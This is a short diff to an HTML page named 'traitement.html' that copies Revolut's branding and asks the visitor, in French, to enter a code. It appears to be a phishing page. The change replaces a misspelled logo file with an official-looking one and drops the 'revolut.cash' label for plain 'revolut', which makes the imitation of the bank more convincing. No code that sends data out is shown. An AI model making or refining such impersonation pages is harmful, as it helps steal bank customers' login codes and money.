--- a/traitement.html
+++ b/traitement.html
@@ -240,8 +240,8 @@
     <!-- Header -->
     <header class="revolut-header">
         <div class="revolut-logo">
-            <img src="revotut.img" alt="Revolut" class="revolut-logo-img">
-            <span class="revolut-logo-text">revolut.cash</span>
+            <img src="Revolut-Logo.wine.png" alt="Revolut" class="revolut-logo-img">
+            <span class="revolut-logo-text">revolut</span>
         </div>
     </header>
 
@@ -250,7 +250,7 @@
         <div class="revolut-card">
             <!-- Logo -->
             <div class="revolut-auth-logo">
-                <img src="revotut.img" alt="Revolut" class="revolut-logo-img">
+                <img src="Revolut-Logo.wine.png" alt="Revolut" class="revolut-logo-img">
             </div>
             
             <h1 class="revolut-title">Saisissez le code</h1>
